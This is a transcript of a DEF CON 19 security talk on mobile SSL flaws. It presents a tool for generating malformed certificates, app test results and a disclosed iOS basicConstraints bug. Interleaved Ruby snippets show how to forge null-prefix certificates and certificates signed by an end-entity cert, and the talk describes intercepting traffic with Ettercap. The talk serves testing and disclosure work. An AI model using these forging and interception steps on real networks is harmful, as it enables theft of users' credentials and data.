For those of you who don't know, you're sitting in the Getting SSLizzard talk. A brief agenda of what we're going to take you through in this talk: some introductions about who we are, a little bit of a primer on SSL, mobile SSL user experiences, research motivations, research implications, a little bit about a test lab that we built; then I'm going to introduce a tool for you, the SSLizzard tool, show you some of the results of us testing some mobile apps and mobile devices, and then there's going to be some audience participation. So real quick, who we are. I'm Nicholas Percoco, the head of the SpiderLabs team at Trustwave. I started my InfoSec career in the 90s doing penetration testing. This is my sixth DEF CON talk; I actually had two others this weekend, the Malware Freakshow talk on Friday and then the Droid talk yesterday. I'm also the primary author of Trustwave's Global Security Report. And I'm Paul Kehrer, the lead SSL developer and the CA architect for Trustwave, and since I don't have a whole lot of other bio information to put up here, we decided to say I'm also a mobile game developer in my spare time, and also sometimes at work. If you're going to HostingCon in the next few days, we're releasing a game there, so we figured we'd hype it now; it went in the App Store this morning, and I promise it's not malicious. Before we start: we have some audience participation at the end of this presentation, where you're going to be able to help us find a mobile SSL flaw. What you'll need: a mobile device — actually, any type of device with internet connectivity, 3G, 4G, or the DEF CON network, can help us out; the ability to enter a URL in your mobile browser; some trust that we're not going to be doing anything malicious to you; and a willingness to stand up if your test is successful.
Just to gauge the audience, how many people here are willing to help out? Okay, great, cool, that's going to be fun. So let's jump into the introductions here. What is this talk about? When Paul and I were planning this talk and the research behind it, really we were discussing the evolution of the security experience on mobile platforms. Obviously when you have a giant 27-inch screen in front of you, there's a lot you can do from a security standpoint — security warnings, messages, and other things you can present to users. But when you cram it down into a small little device, the space is limited. And the developers of the platforms tend to abstract away some of the busy information that you may see, or want to see, on your desktop platforms. We're also going to talk a little bit about some different types of SSL attacks, and the lack of testing tools available for mobile applications, specifically for mobile app developers. We're also going to talk about how various apps and devices perform under SSL stress: we took some popular apps, ran them through some tests, and we're going to present how those actually reacted. And then we're going to release a tool to help solve this problem. So, very briefly — whenever I give talks, I always want to make sure to start with a primer, because about 11 years ago I sat in the audience at DEF CON and saw plenty of talks, and sometimes when I was staring at the presenter I was thinking, I have no idea what this guy's talking about. So I want to bring everybody up to speed, since there could be some people in the audience who maybe aren't familiar with SSL. SSL stands for Secure Sockets Layer.
It uses certificates — digital files defined by the X.509 specification. It was developed by Netscape back in 1994 and was implemented in Netscape Navigator 1.0. A bit of personal history: I remember when Netscape Navigator 1.0 was released. I was sitting in my dorm room, and the day it was released — actually, I think it was probably a couple of hours after it was released — I went to the Netscape store and bought a t-shirt with a credit card. It was my first experience with SSL, sending a secure transmission across the internet using that technology. It's a protocol typically used to secure client-to-server communication — data, specifically. Most of you in this room interact with it every single day. If you do anything online — logging into sites, using a mobile device to log into your online banking account, whatever you may be doing — most people have interaction with it, and some people may not even be aware they're interacting with it. From a key standpoint, it uses asymmetric keys — public and private keys — to establish a symmetric key, which then secures the transmission. So what is SSL used for — specifically, certs? We talked about establishing secure client-to-server communication. It's also used to establish identity. When you visit a website, say a popular financial institution, you often see something like an extended validation indication — the green bar — establishing that you are in fact connecting to the website you think you're going to. It's also used in app signing: the same technology is used to sign applications, specifically in the mobile world. And log file integrity: there are tools out there that will sign your logs to ensure they haven't been tampered with after the fact.
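The asymmetric-to-symmetric key handoff mentioned above can be illustrated with a small sketch using the Ruby OpenSSL bindings. This is a conceptual illustration only, not the actual TLS handshake (real TLS key exchange is considerably more involved, and modern TLS prefers ephemeral Diffie-Hellman): the client wraps a random symmetric key with the server's public key, and both sides then use that symmetric key for bulk encryption.

```ruby
require "openssl"

# Server's long-lived asymmetric keypair (in real SSL, the public half
# arrives inside the server's certificate).
server_key = OpenSSL::PKey::RSA.new(2048)

# Client side: generate a random 256-bit symmetric session key and wrap
# it with the server's public key. Only the private-key holder can unwrap it.
session_key = OpenSSL::Random.random_bytes(32)
wrapped     = server_key.public_key.public_encrypt(session_key)

# Server side: unwrap the session key with the private key.
recovered = server_key.private_decrypt(wrapped)

# Both sides now share a symmetric key for the actual data transfer.
cipher = OpenSSL::Cipher.new("aes-256-cbc").encrypt
cipher.key = session_key
iv = cipher.random_iv
ciphertext = cipher.update("login=alice&password=hunter2") + cipher.final

decipher = OpenSSL::Cipher.new("aes-256-cbc").decrypt
decipher.key = recovered
decipher.iv  = iv
plaintext = decipher.update(ciphertext) + decipher.final
```

The point of the asymmetry is that the wrapped session key can safely cross an untrusted network; only the server can recover it.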
Very similarly in the mobile world, it's used for communication over public networks. It's actually pretty important for secure communication over public networks, because we're all roaming around — walking around at conferences, walking down the street — using our phones from untrusted networks such as coffee shops and places like that. When you submit data that you don't want anybody else to see, you want to send it over the public internet, or even public local networks, in an encrypted format. So it establishes app-to-server communication. It's also used in app code signing, like we already talked about. And it's used in mobile device profiles: if you work for a company and they push profiles down to your iOS device, they'll actually sign those using SSL. Now, a little bit of a cartoon drawing about what man-in-the-middle is — this is where we dive a little deeper into the talk, and we want to describe what a man-in-the-middle attack is. You can see the diagram at the bottom, very cartoon-like. The bad guy is sitting in the middle of the diagram; the end user is over on the left-hand side of the screen, and that's your mobile device. The attacker has injected himself into your network somewhere — maybe on your local LAN, or somewhere in the path between you and the legitimate place you want to visit. So you establish your connection with the attacker, and the attacker then establishes a legitimate connection to the back-end server. When that happens, the attacker is able to intercept the data that you're sending, and possibly modify it as well. So what tools actually exist to help with man-in-the-middle attacks? There are quite a few. We've got thicknet, a man-in-the-middle framework developed by Steve Ocepek, who's a member of the Trustwave SpiderLabs team.
It's written in Perl and is a modular system that allows you to add extra functionality after you've set up your initial man-in-the-middle. There's Ettercap, the gold-standard tool that everybody's familiar with; although it hasn't been developed in quite some time, it's still a very solid and very useful tool for this sort of thing. You can also use more basic tools like arpspoof, which will just spoof ARP — exactly what it sounds like — to cause packets to be redirected to you, and then you can use other tools to intercept and modify those packets, specifically things such as sslstrip and sslsniff. And then there's mitmproxy, which is an SSL-capable intercepting HTTP proxy. So why is a true SSL man-in-the-middle difficult? Well, SSL certificates have what's called a chain of trust. The X.509 spec was based around the concept that you have roots, sometimes called trust anchors. Those roots are present in the certificate store of the device or application that you're using. So for example, you connect to facebook.com using your web browser. Your web browser then builds a chain: it obtains the SSL certificate and any intermediate certificates in the initial handshake, and then uses its own internal methods to try to find a chain of trust up to a root CA that it's already familiar with. So you can't just go and sign your own certificate, because it's not in there. And if you add it to your own store, it's not in anybody else's. The reason for that, of course, is that we don't want you to be able to create www.facebook.com or api.facebook.com or any of those other certificates — why should you be the authoritative source for that? Now, there are other efforts to develop more distributed networks of trust, but for the moment, X.509 is based on the concept that there are trust anchors.
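What that chain-building looks like can be sketched with the Ruby OpenSSL bindings the talk mentions later. This is a toy sketch, not any browser's actual code — all names and lifetimes are made up: we build a root, issue a leaf from it, and then verify against a store that trusts only that root, the same way a client verifies against its shipped trust anchors.

```ruby
require "openssl"

# Helper: build a cert, self-signed when no issuer is given.
def make_cert(subject, issuer_cert, issuer_key, key, ca:)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2                       # X.509 v3
  cert.serial  = rand(2**32) + 1
  cert.subject = OpenSSL::X509::Name.parse(subject)
  cert.issuer  = issuer_cert ? issuer_cert.subject : cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 3600
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate  = issuer_cert || cert
  cert.add_extension(ef.create_extension("basicConstraints",
                                         ca ? "CA:TRUE" : "CA:FALSE", true))
  cert.sign(issuer_key || key, OpenSSL::Digest.new("SHA256"))
  cert
end

root_key = OpenSSL::PKey::RSA.new(2048)
root     = make_cert("/CN=Toy Root CA", nil, nil, root_key, ca: true)

leaf_key = OpenSSL::PKey::RSA.new(2048)
leaf     = make_cert("/CN=www.example.com", root, root_key, leaf_key, ca: false)

store = OpenSSL::X509::Store.new
store.add_cert(root)        # the "trust anchor" shipped with the client

puts store.verify(leaf)     # chains up to a trusted root

# A self-signed cert for the same kind of name, made by an attacker,
# chains to nothing the store trusts.
rogue_key = OpenSSL::PKey::RSA.new(2048)
rogue     = make_cert("/CN=www.facebook.com", nil, nil, rogue_key, ca: false)
puts store.verify(rogue)
```

The first `verify` succeeds and the second fails: the rogue cert's signature is internally valid, but it terminates at an anchor the store has never heard of.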
So now that we've established that you need a public CA for that, you need to find some way to attack a public CA. As proven in the past by Moxie Marlinspike and others, you can attack public CAs. However, it's typically not particularly practical: you need to focus on one specific CA, you may need to spend quite a bit of time, and you may not be successful in the first place. Social engineering usually plays a fairly large component in it, rather than a technical flaw. So then you may want to generate malformed certs. Well, the tooling around generating certificates is pretty streamlined these days, and because the ASN.1 spec, which is what X.509 utilizes, is so complex — it's so easy to get wrong — they actually lock it down pretty heavily in almost all the tooling. So you have to go down and play in the libssl/OpenSSL layers, or use something like the Ruby OpenSSL bindings, to be able to generate malformed ASN.1 structures. That's usually an obstacle for people who aren't familiar with that type of code. And SSL parsing zero-days are difficult to come by. When Moxie's null character attacks worked, he had managed to find both a flaw in the way CAs were validating certificates and a parsing error across multiple different parsing engines — that flaw affected both Firefox's validation routines and IE's SChannel. So, let's talk a little bit about the mobile SSL experience from a user perspective. Obviously there's no standard UI. Whether you have an Android device, an iOS device, webOS, whatever — there's no real standard for letting the end user know that they've established a secure connection. Say you've established an SSL connection: most applications show nothing at all. Fire up your online banking app and you just have to assume that your data is being sent over SSL — but it could be sent in the clear. From an end user's experience, there's no indication of the difference.
In most cases, like I said, there's no UI at all — no lock like you'd see in a browser. It's basically nonexistent. There are things like that in some of the mobile browsers themselves, but even when you see a lock there, you have no ability to drill down deeper and actually check out the certificates being presented to you. And then of course there are cryptic warnings. During our testing we noticed a lot of cryptic warnings; some warnings just didn't even make sense for what was going on in the test. And users don't know the difference. Everybody in this room, being security-aware, would know the difference, but most end users wouldn't — they wouldn't know whether they'd established a secure connection or not, and they wouldn't even know to look. And then, the pop-up could be lying. The screenshot you see there is from an app that I actually downloaded — an app for finding boutique hotels when you travel, ones that are cheaper but maybe a little nicer than chains. When I was using that app, I noticed there was a lock in the corner that says "secured by" with TravelClick on it. You put your finger on that lock and a pop-up box comes up that says "secure booking powered by TravelClick — protected by 256-bit SSL encryption." That could be complete bullshit. You have no idea if that pop-up is lying. Now, the browser community has spent almost two decades tweaking their UI behavior when it comes to SSL. Originally you had padlocks in the corners; you've had padlocks move up next to the URL bar; you've had yellow, you've had green, you've had just white; you've had green locks that don't actually represent EV security. The point is that there is always some presentation, even if that presentation has been changing. So there are ways for you to both look at and validate what you're seeing.
However, the mobile device market in essence destroyed that in less than five years. It went from "at least something to see" to "you need to trust that something good is happening." When you open up your mobile app to connect to Google Plus or Facebook or whatever your social network is, you just assume that it's using SSL. You have no way to tell. That's obviously something of a problem. So if SSL fails silently on that front, well, the world probably doesn't end — but maybe your personal world does. On to our research motivations. Most apps completely ignore the UI aspect of security, so that's something we wanted to look into, like Paul already mentioned. From the end user's standpoint — or even from a developer's standpoint — if you're a mobile app developer, there is zero functionality difference between sending data in the clear and sending data encrypted. So there's no real motivation, other than the protection of the data being sent, for developers to implement it. As an end user, you just have to trust that when you're sending things like credentials or bank account information or credit card information via an app, the developer cares enough about you to actually establish an SSL session and encrypt your data. We also thought there wasn't really an easy set of tools for people to run their apps through these types of tests. And then also, when you find OS-level problems, they can cascade to all apps. If there's an OS-level SSL parsing problem, it could affect every single app on a device, not just one single app. To be fair, that's true of the desktop as well, but on the mobile side, much more so than the desktop side, people tend to use consistent APIs that go down to the OS hooks. For example, on the desktop, you could have several different libraries handling your SSL validation routines.
If you're using Firefox, it uses its own — NSS, specifically. If you're using Safari or Chrome or Internet Explorer or whatever, then you're using SChannel or the OS-level libraries on OS X. On the mobile side, however — unless you've chosen to go a route that very few do — you're emphatically using the OS-level libraries for that. Now, whenever you're doing security research, there are always implications to your research, and obviously something we talk about today could be used by someone to do bad things tomorrow. With attackers really focusing on the mobile app and mobile device world, the results of our research can, like I said, be used to do bad things. Specifically, if there are problems with SSL, they can be used for credential stealing, data interception, even response manipulation back to the client application. The other thing to think about is that these types of attacks will go unnoticed. There's a lack of user awareness — even when users see error messages, if they just click through them, that's a problem as well. And the lack of UI cues within the apps compounds that. Like we talked about earlier, if the SSL fails and it fails silently, users are just blindly submitting their data through networks where it's being intercepted by attackers. So how do you actually build a test lab? There are a lot of ways, obviously, but one of the simplest and cheapest is to get yourself a cheap SOHO switch and router, like a WRT54GL — ideally one that can run a third-party firmware like Tomato or DD-WRT. You also want an attacker system; in our case we used Linux, because it's much easier to compile Ettercap there than anywhere else.
We went ahead and also added a patch to it, which we'll discuss in a little bit. Then you need some victim clients. In our case, we had a Nexus S running what was at the time the latest version of Gingerbread, and an iPod Touch fourth generation running iOS 4.3.3. So what types of certs do you need? Once you've got all that set up, you'll want ones that are valid for the target domain, of course, so you can validate that everything works in the primary use case. You'll also want as many malformed SSL certificate types as you can come up with. Self-signed, which is a common one that many people deal with. CRLF, which is a carriage return/line feed: that's something various libraries have had trouble with in the past. You feed a carriage return/line feed inside the domain, or wrapping domains, and sometimes a parser will stop before or after the CRLF; sometimes it will just break and return true. That shouldn't be true now, but that doesn't mean it isn't. Then the null prefix, which of course was one of Moxie's big ones recently, which we discussed earlier. Invalid ASN.1 structures, where you can write fuzzers to produce various broken loops and mis-nested forms inside your ASN.1 structures. And broken encodings in general, where you can push UTF-8 into BMPStrings and things like that, because ASN.1 has type identifiers you can play around with. And then things like the basicConstraints, keyUsage, and extendedKeyUsage extensions. Every certificate has things encoded in it that tell the browser or the OS what it should allow that cert to do. For instance, a regular server certificate has an extended key usage called serverAuth, and a certificate used for client authentication has one called clientAuth — and serverAuth certs can't be used for client auth, and vice versa.
And in the basicConstraints extension there's typically a field that says CA:FALSE, which means it's not a CA — don't let it sign things. So then you need a method to generate all of the above easily. What we did was write a Ruby script called SSLizzard, an open-source toolkit to easily generate multiple types of invalid certs for any given domain. The output can then be used with Ettercap to run these attacks against your apps, or others', to see if they're vulnerable. We've successfully tested with Ettercap, and we have a patch on the DEF CON 19 DVD that you can apply against any standard Ettercap 0.7.3-NG tree. It adds a new flag, documented in the patch: you pass -x, which allows you to pass any certificate in. Normally Ettercap generates standard self-signed certificates on the fly, and since we want to be able to provide different forms of broken certificates, we need you to use the flag to supply them. There's also a thicknet module being developed by Steve Ocepek; I believe that will be delayed a little bit. Yeah, Steve's doing a talk I think the next hour, called Blinky Lights, and when that talk got accepted it delayed his man-in-the-middle — his thicknet — module a little bit, but he's going to put it out shortly after our talk. This setup can be used against any OS, application, browser, anything — as long as it's connected to the network you've set up, you can man-in-the-middle it. To use the tool, all you have to do is run it. You can either specify options on the command line, or it has an interactive shell for specifying them as well. And I guess we can do the demo. Yeah. The real motivation here was to develop this toolkit for app developers — specifically app developers who may be using their own libraries or their own routines to validate SSL in their applications. And this will be a surprisingly short demo, since it does exactly what you'd expect.
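The kind of generation the tool automates can be sketched with the Ruby OpenSSL bindings. This is an illustrative sketch, not the actual SSLizzard code, covering two of the cert types listed above for a made-up target domain: a plain self-signed cert, and a "null prefix" cert whose CN embeds a null byte. (Whether the null byte survives may depend on the OpenSSL build; passing an explicit ASN.1 string type, as below, is what makes it possible at all, since a plain parse would stop at the first NUL.)

```ruby
require "openssl"

# Build a self-signed cert for the given CN, returning [cert, key].
def self_signed(cn)
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial  = rand(2**32) + 1
  # add_entry with an explicit ASN.1 type passes the raw bytes through,
  # null byte and all; Name.parse would truncate at the NUL.
  name = OpenSSL::X509::Name.new
  name.add_entry("CN", cn, OpenSSL::ASN1::UTF8STRING)
  cert.subject = cert.issuer = name
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 86_400
  cert.sign(key, OpenSSL::Digest.new("SHA256"))
  [cert, key]
end

plain,   _key1 = self_signed("www.target.example")
nullpfx, _key2 = self_signed("www.target.example\0.attacker.example")
```

A vulnerable parser that stops at the NUL sees `www.target.example`; a correct one sees the full, attacker-controlled name and refuses the match.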
You specify the domain you want it to generate certificates for, and they are generated. Now let's take a look at one — let's look at the null character attack one. As you can see, it generated a cert for domain.com with a null character. OpenSSL is actually capable of detecting and re-printing null characters so that you can see them, but in certain other tools you may not see the null character, because it's a null character and unprintable. That's the kind of thing we're generating, and then you have a single key that corresponds to all these certificates. And in Ettercap, once you apply the patch, you can specify the certs to use for your test. As you can see there: you execute it, generate your certs, set up Ettercap using the -x flag to specify the cert type you want to test, and then you use your app as normal and see if you get error messages. If you don't get errors, then you should check Ettercap — you can either have it output data to the screen, or have it write to a pcap file for later analysis with something like Wireshark. That will let you see whether the data was intercepted as you expected. You'll have to execute Ettercap once per cert type generated by SSLizzard to comprehensively test; we don't allow dynamic switching at the moment, although we've been looking into improving the patch. So now we're going to talk a little bit about the mobile app test results. Like we mentioned earlier, we set up the test lab with the various devices, and then we proceeded to man-in-the-middle each of those devices and some popular apps. Sure — so on Android, as you can see, in a lot of ways we didn't find a whole lot. We actually ran several hundred tests across the ASN.1 fuzzers and the various other cert types.
You can see that the self-signed, CRLF, null character, and ASN.1 certs all fail closed. In the browser you get what you'd expect, which is the invalid certificate notification; on Android you can also actually click "view certificate" and see a little bit of the detail. You can't see why the chain might not be working, but you can see the end-entity certificate itself. One of the more interesting things was that when you run these types of attacks, some of the underlying OS libraries get upset: the Facebook app, for example, will completely stop responding. Quitting it and reopening it doesn't seem to help — you sometimes actually have to reboot the entire phone. The other thing we got was confusing error messages. None of them said "bad SSL certificate." They would say things like "no network connection" or "server busy" — basically fallback error messages that just assumed there couldn't be a problem with the SSL cert, that it had to be something else. That was a little bit of an interesting revelation for us. We also tested iOS in basically the same fashion, with the same keys in the results table. If you can't really see it from the back of the room: the green FC means it failed closed — it did what it should. UR means user request: something popped up and asked the user to decide, and it failed open if they clicked through. So obviously this was a little bit disappointing at this stage in the research, that we hadn't found anything. But there were some confusing error messages here as well that we noted. And one thing to note: the Twitter client actually had very nice, accurate error messages. Of all the apps we tested, I think it was the only one that accurately displayed to the end user what the issue actually was. So now we're gonna crowd— you have a question? Oh yeah, sorry, yeah, that's interesting.
Thanks for pointing that out. Yeah, so basically when you went to the sign-up screen in the Facebook app, we noticed that all data was being transmitted over HTTP. It takes you to a custom web view which just loads the m.facebook.com page, which is not over SSL, and everything, including the sign-up form, posts over HTTP for some reason. It does that whether or not you're being man-in-the-middled. That was just a little side thing we found. So now we're gonna do the audience participation. What are we going to do? We're going to test for a specific SSL flaw with the help of the audience members, and we need as many people as possible to test this, so hopefully we'll find some vulnerable devices out there. We're going to show a URL on the next slide. If you see a certificate error when you visit it, don't do anything — we don't need to know that you got that error. But if you see a SpiderLabs logo — and we'll show you what that looks like — we'd like you to stand up. What we're not going to do: we're not pushing anything malicious to your device. I guess you have to trust us on that. And we're not exploiting any known or unknown browser flaws. This is an SSL negotiation test; that's specifically what it is. In fact, we don't even have any JavaScript on that page — it's pure CSS and HTML. A little bit about what we're going to test. If you jump in the time machine and go back to 2002, Moxie published a serious Microsoft Internet Explorer vulnerability related to SSL validation checking. This flaw happens when a client fails to validate that the signers in a chain are valid CAs. It allows an SSL negotiation to complete because, from the client's perspective, it found a chain. Chains are actually unrelated to whether or not a cert is allowed to be a signing CA — that's all in the basicConstraints parameter.
So if something fails to check whether a cert should be capable of signing, and just assumes that it is, then you can sign a certificate — for some other website — underneath your own personal website's cert, pass yours along as an intermediate, and it will validate. That was what Moxie found at the time. So, taking us to the present day: if we have a device — and we found a device during our research — where this is successful, it's basically a complete SSL failure. SSL man-in-the-middle is completely possible whenever that device, or an app on it, is operating on a public network. So today at DEF CON 19, we're going to see if this exists on any mobile platforms in the audience. Do you want to explain what we did to set this up? Sure. What we did is request a cert from a public CA for a meaningless domain — specifically, in this case, we used a cert that I personally have for my own blog. Then we used that certificate in SSLizzard to generate and sign a new certificate and private key just underneath it; basically, we treated that end-entity certificate as a sub-CA. We then installed the resulting certificate and key on a test server and passed the meaningless domain's cert as the intermediate. The correct behavior when visiting this test server is a certificate error — it just shouldn't work. So let's do the test. Everybody in the room, visit ssltest.spiderlabs.com, and if you see this logo on your screen without having to click through anything, please stand up. You want to do it as well with the audience? Sure, I'll go ahead and take a look at it myself here. Oh, sorry about that guys — it is ssltest.spiderlabs.com. So if you see the logo, please stand up. Okay, you want to show what the audience should be seeing? Sure, if everybody's got it here — keep standing. This is what you should see if you are vulnerable to this attack.
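The chain just described can be reproduced end to end in a few lines of Ruby — a toy sketch with made-up names, not the real blog cert or test server. It also shows the difference between the signature-only "validation" the vulnerable clients effectively did and what a correct validator does with the basicConstraints extension.

```ruby
require "openssl"

def issue(subject, issuer, issuer_key, key, ca:)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial  = rand(2**32) + 1
  cert.subject = OpenSSL::X509::Name.parse(subject)
  cert.issuer  = issuer ? issuer.subject : cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 3600
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate  = issuer || cert
  cert.add_extension(ef.create_extension("basicConstraints",
                                         ca ? "CA:TRUE" : "CA:FALSE", true))
  cert.sign(issuer_key || key, OpenSSL::Digest.new("SHA256"))
  cert
end

root_key = OpenSSL::PKey::RSA.new(2048)
root     = issue("/CN=Toy Public Root", nil, nil, root_key, ca: true)

# A legitimately issued end-entity cert -- note CA:FALSE.
blog_key = OpenSSL::PKey::RSA.new(2048)
blog     = issue("/CN=blog.example.com", root, root_key, blog_key, ca: false)

# The attack: use that end-entity cert to sign a cert for some other domain.
forged_key = OpenSSL::PKey::RSA.new(2048)
forged     = issue("/CN=www.bank.example", blog, blog_key, forged_key, ca: false)

store = OpenSSL::X509::Store.new
store.add_cert(root)

# Signature-only check: the math works all the way up to the trusted root,
# which is all a vulnerable client ever looked at.
puts forged.verify(blog.public_key)

# Full validation, with the blog cert passed as the intermediate: rejected,
# because basicConstraints says the blog cert is not a CA.
puts store.verify(forged, [blog])
```

The first check prints true and the second false: the only thing standing between "valid signature chain" and "valid certificate" is the basicConstraints check that the vulnerable devices skipped.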
You should not see a security warning at all. Yeah — if you see a security warning, that means your phone is not vulnerable to this attack. It's not working at all? You get the error on the BlackBerry? Yeah, that's good — which you should. Okay, let's go back to the slides and we'll explain the problem here a little more. So thanks everybody, I guess you can sit back down. Wait, actually, one question while you're standing up: is anybody who did get man-in-the-middled not using an iOS device? We have someone back there — okay, if you can see us after the talk, we'd love to talk to you. So what is your device, sir? ... That runs iOS — thank you though. We have one here. Oh. Interesting. Yeah, if you could see us after the talk, that would be great. There's a Samsung Rogue, he said. Yeah. That is an Android device. Yeah, so — if you could see us after the talk, we'd be interested to talk to you. So basically, this affects anybody using anything older than iOS 4.3.5. If people aren't aware, Apple pushed out a patch a little over a week ago — nine days ago — that specifically addressed this issue. And for those of you who might be on Verizon, 4.2.10 is the patch version that fixes it. This patch was pushed out solely to fix this one bug — there were no other fixes in it, because of the severity of the issue. And on the timeframe, Apple did a great job: it was 10 days after we reported this problem to them that they patched it and pushed out the new release. So in the results here, on the basicConstraints test: the browser, Facebook, Mint, Foursquare, and Twitter all failed open. What that means is that we were able to establish a complete man-in-the-middle on SSL and intercept all the traffic being sent from the client device to the server. And a little side note here: we estimated iOS users' exposure.
The people who stood up are still exposed and still vulnerable to this attack, and it's been that way for about 18 months — everything since at least 3.1.3. And since Apple tends to end-of-life each iPhone after about two years, older devices are no longer eligible for updates, security or otherwise. 3.1.3 was the last version for the original iPhone; 4.1-something was the last version available for the iPhone 3G. So only the 3GS and iPhone 4 are actually eligible to not be vulnerable. I guess a note to the people who were standing in this room: all of you, whether you're on the DEF CON network or anywhere else, can be man-in-the-middled via this method, and we'd probably recommend at this point that you put your phone in airplane mode. The Apple patch fixes the underlying library, so it fixes it for the browser and apps and everything else. After our iOS disclosure, Moxie was pretty tickled about the fact that one of his bugs had come back around, and he released an updated version of sslsniff that will fingerprint and do this to any device on your network. Eric Monti, one of our Trustwave SpiderLabs guys, has developed a workaround for iOS developers who want their app to work on earlier versions and not rely on iOS to do the validation checking. We're going to be posting a blog post about that right after the talk, for people who want to incorporate this code snippet. We'd love more eyeballs on it, because quite frankly we're not sure why it works — but it does seem to. The one big implication there: say you are a financial institution and you have online banking customers who are using your banking app from an iOS device. If those customers are not patched, then all the customers in your ecosystem who are not on the latest version are vulnerable. So iOS developers — specifically that banking application developer — may want to implement this to fix it retroactively on older devices. Right.
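The general idea behind that kind of in-app workaround — validating against a certificate the app already knows, instead of trusting the OS chain validation — is certificate pinning, and it can be sketched in a few lines. This is purely illustrative (in Ruby rather than Objective-C, and not Monti's actual snippet; all names are made up): the app ships a SHA-256 fingerprint of the exact server cert it expects and refuses the connection on any mismatch.

```ruby
require "openssl"

# Toy self-signed cert standing in for the server's real certificate.
def toy_cert(cn)
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial  = rand(2**32) + 1
  cert.subject = cert.issuer = OpenSSL::X509::Name.parse("/CN=#{cn}")
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 3600
  cert.sign(key, OpenSSL::Digest.new("SHA256"))
  cert
end

# The pin: a digest of the full DER-encoded cert, shipped inside the app.
def fingerprint(cert)
  OpenSSL::Digest::SHA256.hexdigest(cert.to_der)
end

# At connection time: compare the presented cert against the pin and bail
# on mismatch, regardless of what the OS chain validation concluded.
def pinned_ok?(presented, pin)
  fingerprint(presented) == pin
end

expected_cert = toy_cert("api.bank.example")
pinned        = fingerprint(expected_cert)

# An attacker's cert can copy the name, but never the fingerprint.
mitm_cert = toy_cert("api.bank.example")

puts pinned_ok?(expected_cert, pinned)
puts pinned_ok?(mitm_cert, pinned)
```

The trade-off of pinning to an exact cert is that the app must ship an update whenever the server's certificate rotates, which is why some implementations pin the public key or an intermediate instead.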
And then, just recently, Hubert — or however his name is pronounced; we know him solely by this alias — released a tool called iSniff, which also does SSL man-in-the-middle against iOS versions below 4.3.5. You can check that out on GitHub as well. So, to conclude here: the basic takeaway is that we need more eyes on this type of testing. That's why we put together this toolkit — so developers can test their apps and their devices, find these problems, and fix them. From a user perspective, we all have to insist that SSL is used for all data transmission. But we also need to insist that the mobile device manufacturers and mobile platform developers fix their UI, so it's more recognizable to us and to other end users what's going on from a secure data transmission standpoint. Apps and devices should always fail closed when there's an SSL problem. In that regard, our testing revealed that in general they try to do that, which is a big improvement over past years. That's an encouraging note, I guess, but it results in a larger dependence on a single failure point, which hopefully people will continue to consistently test to make sure it doesn't have the kinds of problems that have occurred in the past. And one final piece: when we were putting this talk together, we knew the iOS devices would be vulnerable, because we released that advisory with Apple, and we were hoping we might find another device — obviously, in our test lab we didn't have hundreds of flavors of devices to play with. So, to the gentleman with the Samsung device: if you can meet us here, we want to find out a few more details about that device, and you may see an advisory come out very soon on that platform as well. So that's our talk. Thanks everybody. Thank you. Thank you.